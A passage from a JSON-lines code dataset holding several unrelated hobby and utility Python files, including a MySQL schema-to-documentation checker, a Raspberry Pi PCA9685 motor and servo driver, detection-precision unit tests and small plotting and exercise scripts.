_doc_param_info=doc_params_info[param_name])\n null_flag = check_null(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n index_flag = check_index(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n default_flag = check_default(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n comment_flag = check_comment(_database_param_info=database_params_info[param_name], _doc_param_info=doc_params_info[param_name])\n _check_flag = type_flag and key_flag and null_flag and index_flag and default_flag and comment_flag\n database_params_info[param_name]['checked'] = 'yes'\n doc_params_info[param_name]['checked'] = 'yes'\n if _check_flag is False:\n err_map['params'][param_name] = dict()\n if type_flag is False:\n err_map['params'][param_name]['type_err'] = u'数据字典:' + str(doc_params_info[param_name]['type_ori']) + u' 数据库:' + str(database_params_info[param_name]['type'])\n if key_flag is False:\n err_map['params'][param_name]['is_only_err'] = u'数据字典:' + str(doc_params_info[param_name]['is_only_ori']) + u' 数据库:' + str(database_params_info[param_name]['is_only'])\n if null_flag is False:\n err_map['params'][param_name]['is_null_err'] = u'数据字典:' + str(doc_params_info[param_name]['is_null_ori']) + u' 数据库:' + str(database_params_info[param_name]['is_null'])\n if index_flag is False:\n err_map['params'][param_name]['index_err'] = u'数据字典:' + str(doc_params_info[param_name]['is_index_ori']) + u' 数据库:' + str(database_params_info[param_name]['is_index'])\n if default_flag is False:\n err_map['params'][param_name]['default_err'] = u'数据字典:' + str(doc_params_info[param_name]['default_ori']) + u' 数据库:' + str(database_params_info[param_name]['default'])\n if comment_flag is False:\n err_map['params'][param_name]['comment_err'] = u'数据字典:' + str(doc_params_info[param_name]['comment_ori']) + u' 数据库:' + str(database_params_info[param_name]['comment'])\n for param_name in database_params_info.keys():\n if 'checked' not in database_params_info[param_name].keys():\n err_map['params'][param_name] = dict()\n err_map['params'][param_name]['exist'] = u'数据字典缺失字段'\n for param_name in doc_params_info.keys():\n if 'checked' not in doc_params_info[param_name].keys():\n err_map['params'][param_name] = dict()\n err_map['params'][param_name]['exist'] = u'数据库缺失字段'\n\n database_engine_flag = True\n union_index_flag = True\n default_charset_flag = True\n if doc_config['tableEngineFlag']:\n database_engine_flag = database_engine_check(_database_table_info=_database_table_info, _doc_table_info=_doc_table_info)\n if doc_config['unionIndexFlag']:\n union_index_flag = union_index_check(_database_table_info=_database_table_info, _doc_table_info=_doc_table_info)\n if doc_config['tableDefaultCharsetFlag']:\n default_charset_flag = default_charset_check(_database_table_info=_database_table_info, _doc_table_info=_doc_table_info)\n\n if database_engine_flag is False or union_index_flag is False or default_charset_flag is False:\n if database_engine_flag is False:\n err_map['table']['database_engine_err'] = u'数据字典:' + str(_doc_table_info['database_engine_ori']) + u' 数据库:' + str(_database_table_info['database_engine'])\n if union_index_flag is False:\n err_map['table']['union_index_err'] = u'数据字典:' + str(_doc_table_info['union_index_ori']) + u' 数据库:' + str(_database_table_info['union_index_ori'])\n if default_charset_flag is False:\n err_map['table']['default_charset_err'] = u'数据字典:' + str(_doc_table_info['default_charset']) + u' 数据库:' + str(_database_table_info['default_charset'])\n return err_map\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef union_index_check(_database_table_info, _doc_table_info):\n if len(_database_table_info['union_index'].keys()) != len(_doc_table_info['union_index'].keys()):\n return False\n else:\n for key_name in _database_table_info['union_index']:\n if key_name not in _doc_table_info['union_index']:\n return False\n if len(_database_table_info['union_index'][key_name]) != len(_doc_table_info['union_index'][key_name]):\n return False\n for param in _database_table_info['union_index'][key_name]:\n if param not in _doc_table_info['union_index'][key_name]:\n return False\n return True\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef default_charset_check(_database_table_info, _doc_table_info):\n if _database_table_info['default_charset'] == _doc_table_info['default_charset']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef database_engine_check(_database_table_info, _doc_table_info):\n if _database_table_info['database_engine'] == _doc_table_info['database_engine']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_only(_database_param_info, _doc_param_info):\n if _database_param_info['is_only'] == _doc_param_info['is_only']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_null(_database_param_info, _doc_param_info):\n if _database_param_info['is_null'] == _doc_param_info['is_null']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_index(_database_param_info, _doc_param_info):\n if _database_param_info['is_index'] == _doc_param_info['is_index']:\n return True\n elif _database_param_info['is_index'] == 'PRI' or _database_param_info['is_index'] == 'MUL' or _database_param_info['is_index'] == 'UNI':\n if _doc_param_info['is_index'] == 'y':\n return True\n else:\n return False\n else:\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_default(_database_param_info, _doc_param_info):\n if _database_param_info['default'] == '' and _doc_param_info['default'] == 'EMPTY_STRING':\n return True\n if _database_param_info['default'] == '' and _doc_param_info['default'] == 'EMPTY STRING':\n return True\n # if _database_param_info['default'] == 'NULL' and _doc_param_info['default'] == '':\n # return True\n if _database_param_info['default'] == _doc_param_info['default']:\n return True\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_comment(_database_param_info, _doc_param_info):\n database_temp = _database_param_info['comment'].replace('\\\\r\\\\n ', '\\\\n')\n doc_temp = _doc_param_info['comment']\n if compare_config['commentIgnoreCaseFlag']:\n doc_temp = doc_temp.lower()\n database_temp = database_temp.lower()\n if compare_config['commentIgnorePreAndPostSpaceFlag']:\n doc_temp = doc_temp.strip(' ')\n database_temp = database_temp.strip(' ')\n if compare_config['commentIgnoreLineFeedFlag']:\n doc_temp = doc_temp.replace('\\r\\n ', '').replace('\\r', '').replace('\\n', '')\n database_temp = database_temp.replace('\\\\r\\\\n ', '').replace('\\\\r', '').replace('\\\\n', '')\n if database_temp == doc_temp:\n return True\n # print(_doc_param_info['comment'])\n # print(_database_param_info['comment'])\n return False\n\n\n@logService.log_for_call_method(LogService.DEBUG)\ndef check_run(_database, _doc):\n # print(_database.get_table_list())\n # print(_doc.table_info_list)\n filename = round(time.time())\n excel = myExcel.MyExcel('./' + str(filename) + '.xlsx')\n table_info_list = _doc.table_info_list\n # print(table_info_list)\n for doc_table_info in table_info_list:\n if doc_table_info is None:\n continue\n table_name = doc_table_info['table_name']\n try:\n table_info = _database.get_table_info(table_name=table_name)\n\n except pymysql.err.Error as err:\n print(err)\n continue\n check_err = check(_doc_table_info=doc_table_info, _database_table_info=table_info)\n # print(check_err)\n excel.col_write(check_err, table_name)\n excel.save()\n\n\nif __name__ == '__main__':\n mysql_info = MysqlInfo(host='', user='', password='', db='')\n # docx_info = DocxInfo('')\n docx_info = DocxInfo('')\n # for aa in docx_info.table_info_list:\n # print(aa)\n # print(docx_info)\n check_run(_database=mysql_info, _doc=docx_info)\n","repo_name":"stripgentleman/autoCheckMysql","sub_path":"bin.py","file_name":"bin.py","file_ext":"py","file_size_in_byte":10059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"11291222671","text":"\"\"\"Program launcher\n\nchess tournament\n\"\"\"\n\nimport sys\nimport os\nfrom controllers import App\nfrom views import main_menu, all_tournaments_report, TournamentUI\nfrom bcolors import Color\n\n\ndef main_loop(options, tournament):\n \"\"\"Main menu loop\"\"\"\n while True:\n index = main_menu()\n if index == 0:\n print(options[index])\n break\n if index == 9:\n if App.tournaments:\n tournament.menu(len(App.tournaments) - 1)\n elif index >= 0 and index < 5:\n i = options[index]()\n if i is not None:\n tournament.menu(i)\n else:\n input(f\"{Color.OKBLUE}Press ENTER to continue...{Color.ENDC}\")\n\n\ndef main():\n \"\"\"Main function, program initialization\"\"\"\n filename = os.path.split(os.path.abspath(__file__))\n App.program_initialization(filename[0])\n tournament = TournamentUI(filename[0])\n options = [\"Exit\", tournament.create, tournament.select, all_tournaments_report, tournament.edit_player_rank]\n\n if App.tournaments:\n if not App.tournaments[-1].rounds or not App.tournaments[-1].rounds[-1].end:\n tournament.menu(len(App.tournaments) - 1)\n else:\n print(f\"{Color.WARNING}No tournament available...{Color.ENDC}\")\n i = tournament.create()\n if i is not None:\n tournament.menu(i)\n main_loop(options, tournament)\n return sys.exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"josayko-courses/chess_tournament","sub_path":"chess_tournament/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30038811909","text":"import RPi.GPIO as GPIO\nimport time\n\ninfrared1 = 20\ninfrared2 = 21\n \nGPIO.setmode(GPIO.BCM) # setmode를 BCM으로 설정\nGPIO.setup(infrared1, GPIO.IN) # 적외선 장애물 감지 센서 설정\nGPIO.setup(infrared2, GPIO.IN) \n\n\nwhile 1:\n state1 = GPIO.input(infrared1)\n state2 = GPIO.input(infrared2)\n \n t = time.localtime()\n print(f\"{t.tm_hour}:{t.tm_min}:{t.tm_sec} : \", end=\" \")\n print(f\"first : {state1}\", end=\" \")\n print(f\"second : {state2}\")\n\n time.sleep(1)","repo_name":"ndg5778/smartfactory","sub_path":"test/raspberry/infrared.py","file_name":"infrared.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37213512589","text":"#!/usr/bin/env python3\n# from copy import deepcopy\nfrom box import Box\nimport precision as p\n\ntest_iou_threshold = 0.3\ntest_upper_left_x = 50\ntest_upper_left_y = 60\ntest_upper_left = (test_upper_left_x, test_upper_left_y)\ntest_width = 100\ntest_height = 200\ntest_box_pred = Box(\n upper_left=test_upper_left,\n width=test_width,\n height=test_height,\n pred_labels=[{\n 'label': 'julie',\n 'prob': 0.6,\n }, {\n 'label': 'angela',\n 'prob': 0.2,\n }, {\n 'label': 'arbit',\n 'prob': 0.15,\n }, {\n 'label': 'taco',\n 'prob': 0.05,\n }])\ntest_box_low_iou = Box(\n label='julie',\n upper_left=test_upper_left,\n width=test_width * 5,\n height=test_height * 10, )\ntest_box_high_iou = Box(\n label='angela',\n upper_left=test_upper_left,\n width=test_width / 4,\n height=test_height / 2, )\ntest_box_no_overlap = Box(\n label='arbit',\n upper_left=(test_upper_left_x + test_width, test_upper_left_y),\n width=test_width,\n height=test_height, )\ntest_boxes_truth = [test_box_low_iou, test_box_high_iou, test_box_no_overlap]\n# Note that we put two items with the same recall but different precision.\ntest_precision_recall_pairs = [{\n 'precision': 0.8,\n 'recall': 0.25,\n}, {\n 'precision': 0.6,\n 'recall': 0.4,\n}, {\n 'precision': 0.1,\n 'recall': 0.7,\n}, {\n 'precision': 0.4,\n 'recall': 0.95,\n}, {\n 'precision': 0.2,\n 'recall': 0.95,\n}, {\n 'precision': 0.3,\n 'recall': 1.0,\n}]\n\n\ndef test_get_hit_rank_no_overlap():\n \"\"\"It tests the case that no box overlaps the ground truth.\n \"\"\"\n actual = p.get_hit_rank(\n test_box_pred, [test_box_no_overlap], topn=10, iou_th=0.9)\n expected = {\n 'max_iou': 0.0,\n 'is_box_detected': False,\n 'rank': -1,\n 'label': '',\n }\n assert actual == expected\n\n\ndef test_get_hit_rank_iou_too_low():\n \"\"\"It tests the case that the iou of all the boxes are\n lower than the threshold.\n \"\"\"\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=10, iou_th=0.9)\n # The candidate is the test_box_high_iou with iou 1 / (4 * 2)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': False,\n 'rank': 1,\n 'label': 'angela',\n }\n assert actual == expected\n\n\ndef test_get_hit_rank_match_topn():\n \"\"\"It tests the cases that it overlaps some box\n but the results depends on the choice of topn.\n \"\"\"\n # Test the case that it overlaps some box but\n # the matched label is of the rank not covered by topn.\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=1, iou_th=0.1)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': True,\n 'rank': -1,\n 'label': '',\n }\n assert actual == expected\n\n # Test the case that it overlaps some box and\n # it returns the rank of label predicted.\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=3, iou_th=0.1)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': True,\n 'rank': 1,\n 'label': 'angela',\n }\n assert actual == expected\n\n # Test the case that it overlaps some box and\n # the topn input is too large.\n actual = p.get_hit_rank(\n test_box_pred, test_boxes_truth, topn=100, iou_th=0.1)\n expected = {\n 'max_iou': 1 / (4 * 2),\n 'is_box_detected': True,\n 'rank': 1,\n 'label': 'angela',\n }\n assert actual == expected\n\n\ndef test_get_hit_rank_wrong_label():\n \"\"\"It tests the case that it overlaps to some box\n but no label matches.\n \"\"\"\n boxes_truth = [\n Box(\n label='no_one_matches',\n upper_left=test_upper_left,\n width=test_width,\n height=test_height)\n ]\n actual = p.get_hit_rank(test_box_pred, boxes_truth, topn=4, iou_th=0.9)\n expected = {\n 'max_iou': 1.0,\n 'is_box_detected': True,\n 'rank': -1,\n 'label': '',\n }\n assert actual == expected\n\n\ndef test_get_itpl_precision():\n # Test the case if the recall input is too large.\n assert p.get_itpl_precision(1.1, test_precision_recall_pairs) == 0.0\n\n # Test the case that there is at least one item with larger recall\n # than the one input.\n assert p.get_itpl_precision(0.5, test_precision_recall_pairs) == 0.4\n\n\ndef test_get_average_precision():\n pairs = test_precision_recall_pairs\n grids = [0.0, 0.2, 0.4, 0.6, 0.8, 1.0]\n assert abs(p.get_average_precision(pairs, grids) - 0.55) < 1e-6\n","repo_name":"alienlien/dolphin-id","sub_path":"precision_test.py","file_name":"precision_test.py","file_ext":"py","file_size_in_byte":4556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15460485955","text":"# -*- coding: utf-8 -*-\n\"\"\"\n解く前のメモ用\n\n以下解説AC\n本iを持っている場合は1冊、持っていない場合は2冊消費して本iを読める\nなので1巻数から初めてあれば1冊を引く、なければ2冊を引くというように数え上げて行けば良い\n\"\"\"\nfrom sys import setrecursionlimit\n\nsetrecursionlimit(10**7)\n\nN = int(input())\nA = list(map(int, input().split()))\nS = set(A)\nread = 0\nwhile N >= 0:\n read += 1\n N -= 1 if read in S else 2\nprint(read - 1)\n","repo_name":"bun913/atcoder_python","sub_path":"abc271/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20732821396","text":"# -*- coding: utf-8 -*-\n\"\"\"The Raspberry bmp thread\n\nServer files using the http protocol\n\n\"\"\"\n\n__license__ = \"\"\"\n This file is part of Janitoo.\n\n Janitoo is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n Janitoo is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with Janitoo. If not, see .\n\n\"\"\"\n__author__ = 'Sébastien GALLET aka bibi21000'\n__email__ = 'bibi21000@gmail.com'\n__copyright__ = \"Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000\"\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom janitoo.component import JNTComponent\n\ntry:\n from Adafruit_MotorHAT import Adafruit_MotorHAT, Adafruit_StepperMotor, Adafruit_DCMotor\nexcept IOError:\n\n class Adafruit_MotorHAT(object):\n \"\"\" Fake class to allow buil on Continuous Integration tools.\n \"\"\"\n pass\n\n class Adafruit_StepperMotor(object):\n \"\"\" Fake class to allow buil on Continuous Integration tools.\n \"\"\"\n pass\n\n class Adafruit_DCMotor(object):\n \"\"\" Fake class to allow buil on Continuous Integration tools.\n \"\"\"\n pass\n\n logger.exception(\"Can't import Adafruit_MotorHAT\")\n\n##############################################################\n#Check that we are in sync with the official command classes\n#Must be implemented for non-regression\nfrom janitoo.classes import COMMAND_DESC\n\nCOMMAND_MOTOR = 0x3100\nCOMMAND_SWITCH_MULTILEVEL = 0x0026\nCOMMAND_SWITCH_BINARY = 0x0025\n\nassert(COMMAND_DESC[COMMAND_SWITCH_MULTILEVEL] == 'COMMAND_SWITCH_MULTILEVEL')\nassert(COMMAND_DESC[COMMAND_SWITCH_BINARY] == 'COMMAND_SWITCH_BINARY')\nassert(COMMAND_DESC[COMMAND_MOTOR] == 'COMMAND_MOTOR')\n##############################################################\n\nfrom janitoo_raspberry_i2c import OID\n\ndef make_dcmotor(**kwargs):\n return DcMotorComponent(**kwargs)\n\ndef make_pwm(**kwargs):\n return PwmComponent(**kwargs)\n\ndef make_stepmotor(**kwargs):\n return StepMotorComponent(**kwargs)\n\ndef make_servo(**kwargs):\n return ServoComponent(**kwargs)\n\nclass DcMotorComponent(JNTComponent):\n \"\"\" A DC motor component for gpio \"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = kwargs.pop('oid', '%s.dcmotor'%OID)\n name = kwargs.pop('name', \"Motor\")\n product_name = kwargs.pop('product_name', \"Motor\")\n product_type = kwargs.pop('product_type', \"DC Motor\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n uuid=\"speed\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The speed of the motor. A byte from 0 to 255',\n label='Speed',\n default=0,\n set_data_cb=self.set_speed,\n )\n uuid=\"max_speed\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help=\"The max speed supported by the motor. Some motor doesn't seems support 100% PWM. A byte from 0 to 255\",\n label='Speed',\n default=255,\n )\n uuid=\"num\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The number of the motor on the Hat board. A byte from 1 to 4',\n label='Num.',\n )\n uuid=\"actions\"\n self.values[uuid] = self.value_factory['action_list'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The action on the DC motor',\n label='Actions',\n list_items=['forward', 'backward', 'release'],\n default='release',\n set_data_cb=self.set_action,\n is_writeonly = True,\n cmd_class=COMMAND_MOTOR,\n genre=0x01,\n )\n uuid=\"current_speed\"\n self.values[uuid] = self.value_factory['sensor_integer'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The current speed of the motor. An integer from -255 to 255',\n label='CSpeed',\n get_data_cb=self.get_current_speed,\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n\n def get_current_speed(self, node_uuid, index):\n \"\"\"Get the current speed\n \"\"\"\n current_state = self.values['actions'].get_data_index(index=index)\n if current_state == 'forward':\n return self.values['speed'].get_data_index(index=index)\n elif current_state == 'backward':\n return self.values['speed'].get_data_index(index=index) * -1\n else:\n return 0\n\n def set_speed(self, node_uuid, index, data):\n \"\"\"Set the speed ot the motor\n \"\"\"\n self.values['speed'].set_data_index(index=index, data=data)\n try:\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).setSpeed(data)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when setting speed')\n\n def set_action(self, node_uuid, index, data):\n \"\"\"Act on the motor\n \"\"\"\n params = {}\n if data == \"forward\":\n try:\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).run(Adafruit_MotorHAT.FORWARD)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when running forward')\n elif data == \"backward\":\n try:\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).run(Adafruit_MotorHAT.BACKWARD)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when running backward')\n elif data == \"release\":\n m = self.values['num'].get_data_index(index=index)\n if m is not None:\n try:\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.getMotor(m).run(Adafruit_MotorHAT.RELEASE)\n finally:\n self._bus.i2c_release()\n except Exception:\n logger.exception('[%s] - Exception when releasing one motor %s', self.__class__.__name__, m)\n\nclass StepMotorComponent(JNTComponent):\n \"\"\" A stepper motor component\"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = kwargs.pop('oid', '%s.stepmotor'%OID)\n name = kwargs.pop('name', \"Motor\")\n product_name = kwargs.pop('product_name', \"Motor\")\n product_type = kwargs.pop('product_type', \"Step Motor\")\n product_manufacturer = kwargs.pop('product_manufacturer', \"Janitoo\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, product_manufacturer=product_manufacturer, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n\nclass PwmComponent(JNTComponent):\n \"\"\" A led driver component\"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = kwargs.pop('oid', '%s.pwm'%OID)\n name = kwargs.pop('name', \"Motor\")\n product_name = kwargs.pop('product_name', \"PWM channel\")\n product_type = kwargs.pop('product_type', \"PWM channel\")\n product_manufacturer = kwargs.pop('product_manufacturer', \"Janitoo\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, product_manufacturer=product_manufacturer, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n uuid=\"level\"\n self.values[uuid] = self.value_factory['action_switch_multilevel'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The level of the LED. A byte from 0 to 100',\n label='Level',\n default=0,\n set_data_cb=self.set_level,\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n uuid=\"max_level\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help=\"The max level supported by the LED. Some LED doesn't seems support 100% PWM. A byte from 0 to 100\",\n label='Max level',\n default=100,\n )\n uuid=\"num\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The number of the LED on the board. A byte from 0 to 15',\n label='Num.',\n )\n uuid=\"switch\"\n self.values[uuid] = self.value_factory['action_switch_binary'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n set_data_cb=self.set_switch,\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n\n def set_level(self, node_uuid, index, data):\n \"\"\"Set the level ot the LED\n \"\"\"\n p = self.values['num'].get_data_index(index=index)\n self._bus.i2c_acquire()\n try:\n self._bus.pca9685_manager.set_pwm(p, int(data*4096/100),0)\n self.values['level'].set_data_index(index=index, data=data)\n except Exception:\n logger.warning(\"[%s] - set_level invalid data : %s\", self.__class__.__name__, data)\n finally:\n self._bus.i2c_release()\n\n def set_switch(self, node_uuid, index, data):\n \"\"\"Switch On/Off the led\n \"\"\"\n if data == \"on\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 4096, 0)\n self.values['level'].set_data_index(index=index, data=100)\n except Exception:\n logger.exception('[%s] - Exception when switching on', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n elif data == \"off\":\n self._bus.i2c_acquire()\n try:\n p = self.values['num'].get_data_index(index=index)\n self._bus.pca9685_manager.set_pwm(p, 0, 4096)\n self.values['level'].set_data_index(index=index, data=0)\n except Exception:\n logger.exception('[%s] - Exception when switching off', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n else:\n logger.warning(\"[%s] - set_switch unknown data : %s\", self.__class__.__name__, data)\n\nclass ServoComponent(JNTComponent):\n \"\"\" A servo component\"\"\"\n\n def __init__(self, bus=None, addr=None, **kwargs):\n \"\"\"\n \"\"\"\n oid = kwargs.pop('oid', '%s.servo'%OID)\n name = kwargs.pop('name', \"Servo\")\n product_name = kwargs.pop('product_name', \"Servo\")\n product_type = kwargs.pop('product_type', \"Servo\")\n product_manufacturer = kwargs.pop('product_manufacturer', \"Janitoo\")\n JNTComponent.__init__(self, oid=oid, bus=bus, addr=addr, name=name,\n product_name=product_name, product_type=product_type, product_manufacturer=product_manufacturer, **kwargs)\n logger.debug(\"[%s] - __init__ node uuid:%s\", self.__class__.__name__, self.uuid)\n uuid=\"num\"\n self.values[uuid] = self.value_factory['config_byte'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The number of the servo on board. A byte from 0 to 15',\n label='Num.',\n )\n uuid=\"pulse_min\"\n self.values[uuid] = self.value_factory['config_integer'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The minimal pulse',\n label='Pulsemin',\n default=200,\n )\n uuid=\"pulse_max\"\n self.values[uuid] = self.value_factory['config_integer'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n help='The maximal pulse',\n label='Pulsemax',\n default=700,\n )\n uuid=\"angle\"\n self.values[uuid] = self.value_factory['action_string'](options=self.options, uuid=uuid,\n node_uuid=self.uuid,\n set_data_cb=self.set_angle,\n help='Set the angle of the servo. Format is value|angle_min|angle_max',\n label='angle',\n )\n poll_value = self.values[uuid].create_poll_value(default=300)\n self.values[poll_value.uuid] = poll_value\n\n def translate(self, value, left_min, left_max, right_min=None, right_max=None):\n \"\"\" Translate a value in a range to a value in the servo's limits\n \"\"\"\n if right_min is None:\n right_min = self.values['pulse_min'].data\n if right_max is None:\n right_max = self.values['pulse_max'].data\n # Figure out how 'wide' each range is\n left_span = left_max - left_min\n right_span = right_max - right_min\n # Convert the left range into a 0-1 range (float)\n value_scaled = float(value - left_min) / float(left_span)\n # Convert the 0-1 range into a value in the right range.\n return int(right_min + (value_scaled * right_span))\n\n def set_angle(self, node_uuid, index, data, pin=None):\n \"\"\" Change the angle of the servo\n \"\"\"\n self._bus.i2c_acquire()\n try:\n if pin is None:\n pin = self.values['num'].data\n angle, angle_min, angle_max = data.split('|')\n value = self.translate(float(angle), float(angle_min), float(angle_max))\n logger.debug('[%s] - set_angle on pin %s to %s', self.__class__.__name__, pin, angle)\n self._bus.pca9685_manager.set_pwm(pin, 0, value)\n self.values['angle']._data = data\n except Exception:\n logger.exception('[%s] - Exception when set_angle', self.__class__.__name__)\n finally:\n self._bus.i2c_release()\n","repo_name":"bibi21000/janitoo_raspberry_i2c_pca9685","sub_path":"src/janitoo_raspberry_i2c_pca9685/pca9685.py","file_name":"pca9685.py","file_ext":"py","file_size_in_byte":15466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"29175585522","text":"# define variables\nshopList = []\n\n# list function to print out list\ndef listFunc(shopList, n):\n for n in range(len(shopList)):\n print(shopList[n])\n\n# Input number of fruits to go into the list\nnumberOfFruits = int(input(\"Enter number of elements in the list : \"))\n\n# enter your list of fruits one by one\nfor i in range(0, numberOfFruits):\n item = input(\"Enter your Item to the List: \")\n shopList.append(item) # adding the element\n\n# call your list function!\nlistFunc(shopList, numberOfFruits)\n","repo_name":"Nyas162/Junior-Girl-Scouts","sub_path":"activity3-part2.py","file_name":"activity3-part2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"21473795345","text":"#program 11\n\nimport matplotlib.pyplot as plt \n#sample data for monthly sales\nmonths=['jan','feb','mar','apr','may']\nsales=[10000,12000,8000,15000,11000]\n\n#creating a line plot\nplt.plot(months,sales,marker='o')\nplt.xlabel('months')\nplt.ylabel('sales')\nplt.title('monthly sales prediction')\nplt.grid(True)\nplt.show()\nprint()\n#scatter plot\nplt.scatter(months,sales)\nplt.xlabel('months')\nplt.ylabel('sales')\nplt.title('monthly sales prediction')\nplt.grid(True)\nplt.show()\n#bar plot\nplt.bar(months,sales)\nplt.xlabel('months')\nplt.ylabel('sales')\nplt.title('monthly sales prediction')\nplt.grid(True)\nplt.show()\n","repo_name":"USMK12/Data-Science","sub_path":"exp_program-11.py","file_name":"exp_program-11.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"28402493067","text":"import pandas as pd\r\nfrom scipy import stats\r\nimport matplotlib.pyplot as plt\r\n\r\ndata1 = pd.read_csv('data-1.csv')\r\ndata1_x_mean = data1['x'].mean()\r\ndata1_y_mean = data1['y'].mean()\r\n\r\ndata1_x_std = data1['x'].std()\r\ndata1_y_std = data1['y'].std()\r\n\r\ndata1_x_min = data1['x'].min()\r\ndata1_y_min = data1['y'].min()\r\n\r\ndata1_x_max = data1['x'].max()\r\ndata1_y_max = data1['y'].max()\r\n\r\n# correlation - r\r\ndata1_r = stats.linregress(data1['x'], data1['y']).rvalue\r\nprint (data1_r)\r\n\r\n# use scatter plot to visually verify if they are correlated\r\nplt.scatter(data1['x'], data1['y'])\r\nplt.title('data-1 correlation scatter plot')\r\nplt.show()","repo_name":"tomliangg/Reddit_Weekends","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27257526689","text":"import 